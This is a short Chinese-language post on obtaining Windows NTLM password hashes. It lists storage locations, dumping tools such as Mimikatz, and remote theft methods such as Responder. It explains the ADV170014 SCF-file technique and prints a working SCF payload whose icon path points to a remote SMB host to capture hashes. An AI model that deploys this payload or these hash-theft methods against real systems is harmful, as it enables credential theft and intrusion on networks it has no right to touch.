获取 NTLM

发布于 2024-12-19 00:11:07 字数 1565 浏览 0 评论 0

1 相关背景

1.1 NTLM 的存储位置

  1. 系统数据库 SAM (Security Account Manager)
  2. DIT 数据库
  3. 内存 Cache

1.2 NTLM 的获取方式

  1. 从 SAM 获取
  2. 内存获取
  3. DIT 数据库获取
  4. WCE、PWDUMP、MIMIKATZ…

1.3 NTLM 的形式

  1. aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
  2. LMHash (windows 2008 R2 系统以后系统默认不保存 LMHash)
  3. NTHash
  4. NetHash - 主要获取该种 hash

1.4 远程获取方式(窃取)

  1. Responder
  2. HTTP + SMB
  3. SCF + SMB
  4. SQL + SMB

ADV 170014 NTLM SSO

2017 年 10 月,微软在周二补丁日公布了一份安全公告(ADV170014),这份安全公告中提到了 NTLM 身份验证方案中的一个漏洞,恶意攻击者可以利用这个漏洞来窃取哈希。

攻击者只需要将一个恶意的 SCF 文件放置在可公开访问的 Windows 文件夹中即可。

一旦文件被放在文件夹中,就会被一个神秘的 bug 执行。它会收集目标的 NTLM 密码散列,并将其发送到一个配置服务器中。

目标主机存在没有设置密码保护的一个共享文件夹,这种场景非常常见,比如办公室、学校、医院以及大多数 Windows 环境中,人们都会通过共享文件夹来共享音乐、照片以及文档。

攻击场景

非正版系统可能没有该设置:

微软在 Windows 3.11 时引入了 SCF 文件。SCF 文件其实是纯文本文件,可以用来指导 Windows 文件资源管理器执行一些基本任务。

[Shell]
Command=2 
IconFile=\\192.168.1.2\sharetest.ico 
[Taskbar] 
Command=ToggleDesktop

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

み青杉依旧

暂无简介

0 文章
0 评论
23 人气
更多

推荐作者

已经忘了多久

文章 0 评论 0

15867725375

文章 0 评论 0

LonelySnow

文章 0 评论 0

走过海棠暮

文章 0 评论 0

轻许诺言

文章 0 评论 0

信馬由缰

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文